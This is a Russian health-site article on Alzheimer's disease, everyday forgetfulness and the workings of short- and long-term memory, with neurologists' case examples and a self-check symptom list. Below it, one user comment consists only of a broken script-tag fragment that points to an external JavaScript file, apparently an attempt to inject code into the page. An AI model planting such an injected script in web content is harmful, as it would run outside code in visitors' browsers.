Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Болезнь Альцгеймера. Расс...  >>  Болезнь Альцгеймера. Рассеянность – повод для тревоги
 
Обратная связь
 

Болезнь Альцгеймера. Рассеянность – повод для тревоги

Размер шрифта
28 января 2011 00:00
  • google_analytics: false
  • Нравится

Представьте: вас бросили в одиночестве в маленьком китайском городке, где вы не понимаете ни языка, ни надписей; многие обычаи кажутся вам странными, а действия, которые с легкостью выполняют другие (например, еда с помощью палочек) – сложными. Вдобавок к вашим злоключениям окружающие люди, которые все для вас на одно лицо, обращаются с вами так, как будто вы давно и хорошо с ними знакомы.

Приблизительно так чувствует себя человек, страдающий серьезным расстройством памяти…

Увы, ни что именно вызывает болезнь Альцгеймера (а именно о ней, в первую очередь, упоминают неврологи, когда речь заходит о деменции (от лат. Dementia – «слабоумие»)), ни как ее предотвратить, ни одно научное или медицинское светило сказать пока не в состоянии, хотя существуют научные фонды по изучению этого грозного заболевания. Пока что представители ведущей в мире организации по «Альцгеймеру», Британский фонд исследования болезни Альцгеймера, находится на той стадии, когда, изучая ту или иную предполагаемую причину, врачи приходят к выводу, что она никак не связана напрямую с зарождением болезни. Но с каждой новой отсекаемой вероятностью приближение к тайнам механизма этой болезни, разрушающей мозг (пусть и от противного) становится все ближе.

Чем активнее и разностороннее умственная деятельность дошкольника, тем больше вероятность, что он проживет всю жизнь в ясном уме и твердой памяти

К счастью, это крайняя стадия, довольно редко встречающаяся даже в критической возрастной группе старше 65 лет. Болезнь Альцгеймера поражает не более 10% пожилых людей.

В то же время, жалобы на неспособность сосредоточиться, на то, что из головы вылетают самые привычные слова и забываются очень важные встречи, сильно «помолодели». Даже 25-30-летние активные, успешные целеустремленные люди жалуются на неспособность сосредоточиться, забывчивость, рассеянность. В чем проблема? И есть ли для нее решение?

Память девичья

Способность забывать – условие столь же необходимое для нормального функционирования мозга, как и навык запоминания. Забывая, мозг «самоочищается» от ставшей ненужной информации, высвобождая место для более актуальных данных. Но когда из головы регулярно и «в никуда» исчезают нужные сведения, мы понимаем – произошел сбой. По какой причине?

Память – настолько тонкая и сложная материя, что нанести ей урон могут самые разные факторы. Одни из них – чисто физиологического, органического происхождения, другие носят психологический и даже социальный характер.

В первом случае речь может идти не только о поражении тех или иных участков мозга или кровеносных сосудов; иногда снижение памяти становится следствием диабета, авитаминоза и даже не вылеченных венерических болезней. Выявить причину может только тщательное обследование. Решение в данном случае – подбор терапии, в том числе медикаментозной.

«48-летний преподаватель университета заметил, что стало тяжелее вспоминать нужный номер телефона, имена людей, с которыми нечасто встречался. Большой профессиональный опыт позволял по-прежнему блестяще справляться со своими обязанностями, но он все-таки отправился на прием к неврологу. При тщательном нейропсихологическом обследовании были выявлены признаки начинающегося заболевания мозга, связанного с высоким артериальным давлением. Правильный подбор препаратов решил проблему», – рассказывает невролог, доктор медицинских наук Павел Рудольфович Камчатнов.

Страх, что забывчивость является предвестником грозного заболевания, старости, крушения планов и надежд, способна нанести психологическую травму намного более серьезную, чем реально имеющие место нарушения

Но и психологический фактор не следует сбрасывать со счетов: постоянно нарастающий объем информации, увеличивающееся число требований, рост обязанностей может вынудить мозг «встать на предохранитель».

«Вот достаточно типичный случай для современной практики: 35-летняя женщина, менеджер, мать сына-школьника. Серьезные нагрузки на службе, необходимость заканчивать работу по ночам и в выходные. Через некоторое время она обнаружила, что стала хуже запоминать новую информацию. Пыталась помогать себе, составляя записки-напоминания, но не всегда могла вспомнить, куда положила их. Страх надвигающегося тяжелого недуга привел ее к врачу. После расспроса и обследования были исключены признаки заболевания головного мозга и выявлена причина проблем – чрезмерная загруженность. Упорядоченный режим, дозированные физические нагрузки позволили добиться восстановления «нарушенной» памяти и улучшения настроения».

Для сохранения ясной головы огромное значение имеет общий эмоциональный фон. «Страх, что забывчивость, может быть, мнимая, а не реально существующая, является предвестником грозного заболевания, старости, крушения планов и надежд, способна нанести психологическую травму намного более серьезную, чем имеющие место нарушения, – считает доктор Камчатнов. – Случается, что даже тщательное психологическое обследование многих пациентов с депрессивными и невротическими расстройствами не позволяет выявить объективных нарушений памяти, хотя сами пациента активно жалуются на ее снижение, нередко считая основным источником своих проблем». Соответственно, чем больше положительных эмоций мы испытываем, чем спокойней себя ведем, тем лучше и для организма в целом и для памяти в частности.

Двойной стандарт

Как же работает память? На самом деле, у нас даже не одна, а две памяти: кратковременная и глубинная.

«Кратковременная память представляет собой возможность удержания чувствительной, или сенсорной информации: слуховой, зрительной, обонятельной и пр. Длится действие этого вида памяти – несколько десятков секунд, максимум – минут. Механизмы активного процесса запоминания не включаются, поступающая информация не «кодируется» в слова, не подвергается логической обработке, и, как следствие, при отвлечении внимания быстро забывается», – объясняет Павел Рудольфович Камчатнов. На химическом уровне кратковременной памяти соответствует выработка определенных белков, воздействующих на нейроны: белок распадается, и связанное с ним воспоминание стирается.

Британский фонд исследования болезни альцгеймера полагает, что витамины группы B могут предотвратить развитие болезни, однако для этого требуются очень солидные дозы

Долговременная или глубинная память способна сохранять информацию сколь угодно долго и имеет практически неограниченный объем. Здесь задействуется совершенно другой процесс. Между нейронами клеток головного мозга образуются устойчивые связи – синапсы. Каждая такая «ниточка» буквально отпечатывает в мозгу событие, переживание или действие и сохраняется до тех пор, пока не погибнут эти клетки и не нарушится связь между ними. Именно плетением нерушимых нейронных сетей объясняется то, что многие навыки никогда не исчезают бесследно. Невозможно разучиться плавать или ездить на велосипеде; невозможно до конца забыть иностранный язык, который хорошо знала в детстве – при попадании в соответствующую среду (водную или языковую – не имеет значения) умение постепенно восстанавливается как необходимое для нормального существования и даже выживания.

Тем же механизмом объясняется тот факт, что даже тщательно вымаранные из активной памяти воспоминания (вытеснение информации о страданиях, унижениях, потерях – часть защитного механизма организма) «всплывают», напоминают о себе. Мы не в состоянии вспомнить его детали, однако оно не забывает нас, посылая мозгу свои сложные сигналы, являясь причиной формирования невроза. Помочь здесь может работа психотерапевта.

Удивительно, но в мозге нет специального локализованного центра, отвечающего за запоминание. Эту функцию распределяют между собой сразу несколько зон, в первую очередь – гипокамп (глубинные отделы височной доли). «Именно из-за «рассеянности» центров памяти по всему мозгу нередки случаи, когда поражение довольно значительного участка коры мозга практически не отражается на памяти, и наоборот – крошечный дефект наносит способности запоминать огромный ущерб», – объясняет доктор медицинских наук, профессор-невролог Игорь Владимирович Дамулин.

Экспересс-проверка

Как выяснить, с чем связаны участившиеся (и безуспешные) поиски ключей, забытые обещания, пропущенные встречи? Есть ли необходимость обратиться к специалисту или двухнедельный отпуск и грамотный тайм-менеджмент способны поправить дело?

При угнетенном, депрессивном состоянии, которое часто становится причиной ослабления памяти, этот процесс развивается быстро и интенсивно (в течение нескольких месяцев). При деменции же первичная симптоматика проявляется спустя год после начала заболевания и поначалу не вызывает серьезного беспокойства ни у больного, ни у его окружения. Больному свойственно также постепенное и равномерное снижение способности выполнять задания одинаковой сложности, в то время как при депрессии поручения одного порядка могут выполняться блестяще или провально, в зависимости от общего состояния. Есть и другие критерии.

На сайте www.memorylab.ru, разработанном Лабораторией Памяти при Клинике нервных болезней им. А.Я. Кожевникова (ММА им. И.М. Сеченова), приводятся следующие симптомы:

  • Вы никогда не помните, что и куда положили и из-за этого все время теряете нужные вещи
  • Вы никак не можете запомнить имена и лица людей, с которыми знакомитесь
  • Вы быстро забываете то, что только что прочитали или посмотрели по телевизору
  • Вам больше неинтересно то, что интересовало совсем недавно, вы перестали читать, смотреть кинофильмы (кроме сериалов), встречаться с людьми
  • Вы забываете, как называются предметы, в разговоре бывает нередко трудно подобрать нужное слово, вы часто оговариваетесь
  • Вам часто бывает трудно сосредоточиться
  • Вы испытываете трудности при счете денег в магазине
  • Вам трудно самостоятельно найти дорогу в незнакомой части города
  • Ваши сослуживцы и домашние обращают внимание на ваши проблемы с памятью

Если к вам относятся не меньше трех пунктов из списка, которые причиняют заметное неудобство, вам и вашим близким в течение нескольких недель, возможно, имеет смысл обратиться к врачу.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:22

Комментарий удален за нарушение Правил общения

Статьи

       
Лучшие привычки для молодости мозга   Запомните на 23% больше с помощью этого простого трюка   Ваш индекс массы тела предскажет, будет у вас слабоумие или нет   Арахис и линейка предскажут ваше будущее  
17 января 2013Старческого маразма больше нет! Изобретена вакцина против болезни Альцгеймера! 14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия
 
30 августа 2012Высокий сахар в крови приводит к старческому слабоумию! 28 августа 2012Если вы лечите диабет – будете умнее!
 

Слайдшоу

1
Мифы и правда о старческом слабоумии
Что сделает вас глупой?
Игры, которые сделают вас гением!

Тесты

Знаете ли вы свой мозг?
Возраст мозга
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.